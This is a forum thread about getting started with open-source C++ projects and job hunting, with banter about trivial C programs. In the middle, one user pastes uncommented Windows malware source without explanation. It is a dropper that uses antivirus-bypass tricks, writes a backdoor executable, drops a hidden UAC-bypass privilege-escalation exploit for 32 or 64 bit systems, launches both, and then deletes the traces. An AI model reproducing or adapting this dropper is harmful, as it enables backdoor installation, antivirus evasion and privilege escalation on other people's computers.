Need help- How to start with open source C++ projects?

[A$HU]

LoL! Nope

They saw my resume and thought I could be help on 2 Security projects they are working on.

Although the I work in Samsung's research division,my team doesnt do any research work.Basically it works on the application layer of android.And I want to change my company first.I cant do this trivial work.Its very diifficult to work in a non challenging environment.

Yes, but more better option in my opinion will be, create an addon or extention for firefox. If that becomes a hit, you can earn from it in future.

haha..I'd surely like that options after few months of work on mozilla.BTW where are you working?

 

[utraash]

I could go beyond few syntax of C... Forget about C++ .....

main(void)
{

 

[A$HU]

I could go beyond few syntax of C... Forget about C++ .....

main(void)
{

Haha.Then I hope your living doesnt depends on it.

 

[Jazzbot]

haha..I'd surely like that options after few months of work on mozilla.BTW where are you working?

I'm PHP developer, recently working in Laravel which is PHP's latest framework. Running my own little company in Lahore, we work primarily on web development.

 

[Kyusuibu Honbu]

Although the I work in Samsung's research division,my team doesnt do any research work.Basically it works on the application layer of android.And I want to change my company first.I cant do this trivial work.Its very diifficult to work in a non challenging environment.

I recommend a startup company then.

Just curious, what do you make of this program?

#include <windows.h>
#include <iostream>

// Functions for AntiVirus bypass
#include "bypass.hpp"

// Plain installer
#include "installer.hpp"

// Local privileges elevators
#include "x32_elevator.hpp"
#include "x64_elevator.hpp"

// ======= [BEGIN EASY COSTUMIZATION] =======
#define EXPLOIT_EXE_NAME    "temp.exe"
#define BACKDOOR_EXE_NAME    "net.exe"
// ======== [END EASY COSTUMIZATION] ========

#pragma warning(disable : 4996)            // Keep using GetVersionEx()

// Check if the system is vulnerable to a Local Privileges Escalation
BOOL IsVulnerableOS()
{
    OSVERSIONINFO osvInfo;

    memset(&osvInfo, 0, sizeof(OSVERSIONINFO));
    osvInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

    // http://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx
    // Check version is greater than Windows Vista ｩ
    if (GetVersionEx(&osvInfo))
        return osvInfo.dwMajorVersion == 6;

    return TRUE;
}

// Check if the architecture is 32 or 64 bit
BOOL IsAMD64()
{
    __tGetNativeSystemInfo lpfnGetNativeSystemInfo;
    SYSTEM_INFO sysInfo;

    memset(&sysInfo, 0, sizeof(SYSTEM_INFO));

    // Simple bypass for AV
    AV_BYPASS__GetNativeSystemInfo(lpfnGetNativeSystemInfo)

    if(NULL != lpfnGetNativeSystemInfo)
        lpfnGetNativeSystemInfo(&sysInfo);
    else
        GetSystemInfo(&sysInfo);

    // This is outdated wProcessorArchitecture instead of dwOemId should be used
    if ((WORD)sysInfo.dwOemId == PROCESSOR_ARCHITECTURE_AMD64)
        return TRUE;

    return FALSE;
}

int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    CHAR szShellExecute[14];

    CHAR szWorkFileName[MAX_PATH];
    CHAR szTempPath[MAX_PATH];
    CHAR szWorkDir[MAX_PATH];
    CHAR szNetPath[MAX_PATH];

    GetCurrentDirectory(MAX_PATH, szWorkDir);
    sprintf(szTempPath, "%s\\" EXPLOIT_EXE_NAME, szWorkDir);

    GetModuleFileName(NULL, szWorkFileName, MAX_PATH);
    FILE *f = fopen(szWorkFileName, "rb");

    if (NULL == f)
        return 0;

    // Inject configuration in the executable
    char lpBuf[288] = {};

    fseek(f, 688, 0);
    fread(lpBuf, 1, 288, f);

    memcpy(&g_lpInstaller[688], lpBuf, 288);

    HANDLE hNetHandle;
    __tShellExecute lpfnShellExecute;
    if (TRUE == IsVulnerableOS())
    {
        sprintf(szNetPath, "%s\\" BACKDOOR_EXE_NAME, szWorkDir);

        // Write the backdoor and wait for privileges escalation
        hNetHandle = CreateFile(szNetPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (INVALID_HANDLE_VALUE != hNetHandle)
        {
            DWORD dwTmp = 0;

            WriteFile(hNetHandle, g_lpInstaller, sizeof(g_lpInstaller), &dwTmp, 0); // Original size: 55808
            CloseHandle(hNetHandle);
        }

        // Write exploit to attempt local privileges escalation
        // (See http://www.pretentiousname.com/misc/win7_uac_whitelist2.html for more info)
        HANDLE hTempHandle = CreateFile(szTempPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN, NULL);
        if (INVALID_HANDLE_VALUE != hTempHandle)
        {
            DWORD dwTempTmp = 0, dwSizeTemp;
            const unsigned char *lpBufTemp;

            if (TRUE == IsAMD64())
            {
                dwSizeTemp    = sizeof(g_lpElevator64); // Original size: 88576
                lpBufTemp    = g_lpElevator64;
            }
            else
            {
                dwSizeTemp    = sizeof(g_lpElevator32); // Original size: 81920
                lpBufTemp    = g_lpElevator32;
            }

            WriteFile(hTempHandle, lpBufTemp, dwSizeTemp, &dwTempTmp, 0);
            CloseHandle(hTempHandle);
        }

        Sleep(200);

        // Simple bypass for AV
        AV_BYPASS__ShellExecute(szShellExecute)
        lpfnShellExecute = (__tShellExecute)GetProcAddress(LoadLibrary("Shell32.dll"), szShellExecute);

        // Execute the exploit and try to gain privileges
        if (NULL != lpfnShellExecute(NULL, "Open", szTempPath, NULL, NULL, SW_SHOWNORMAL))
        {
            Sleep(20000);

            DeleteFile(szTempPath);
            DeleteFile(szNetPath);

            return 0;
        }
    }
    else
    {
        sprintf(szNetPath, "%s\\" BACKDOOR_EXE_NAME, szWorkDir);

        // Write the backdoor and skip privileges escalation
        hNetHandle = CreateFile(szNetPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (INVALID_HANDLE_VALUE != hNetHandle)
        {
            DWORD dwTmp_ = 0;

            WriteFile(hNetHandle, g_lpInstaller, sizeof(g_lpInstaller), &dwTmp_, 0); // Original size: 55808
            CloseHandle(hNetHandle);
        }

        Sleep(200);

        // Simple bypass for AV
        AV_BYPASS__ShellExecute(szShellExecute)
        lpfnShellExecute = (__tShellExecute)GetProcAddress(LoadLibrary("Shell32.dll"), szShellExecute);

        // Execute the backdoor without escalating privileges
        if (lpfnShellExecute(NULL, "Open", szNetPath, NULL, NULL, SW_SHOWNORMAL))
        {
            // Simple bypass for AV
            AV_BYPASS__Sleep(20000)

            DeleteFile(szNetPath);
            return 0;
        }
    }

    return 0;
}

 

[utraash]

Haha.Then I hope your living doesnt depends on it.

Yes.... In telecom industry..... Passive network.....

 

[A$HU]

I recommend a startup company then.

Do you know any good one?

 

[Kyusuibu Honbu]

Do you know any good one?

location?

 

[A$HU]

location?

preferably NCR.

 

[acetophenol]

#include<iostream.h>
#include<conio.h>
void main()
{int a,b,c;
cout<<"enter the numbers";
cin>>a>>b;
c=a+b;
cout<<"sum is:"<<c;
getch();
}


.......nuff said!

 

[A$HU]

#include<iostream.h>
#include<conio.h>
void main()
{int a,b,c;
cout<<"enter the numbers";
cin>>a>>b;
c=a+b;
cout<<"sum is:"<<c;
getch();
}


.......nuff said!

Pretty sure you even copied this .

 

[Kyusuibu Honbu]

preferably NCR.

LoL, just left Gurgaon.

Will check with my IIT friends here

 

[A$HU]

LoL, just left Gurgaon.

Will check with my IIT friends here

Haha will wait for your reply here..Are you from north?

 

[Kyusuibu Honbu]

Haha will wait for your reply here..Are you from north?

Nope, from Hyd

 

[acetophenol]

Pretty sure you even copied this .

God promise I wrote it myself:p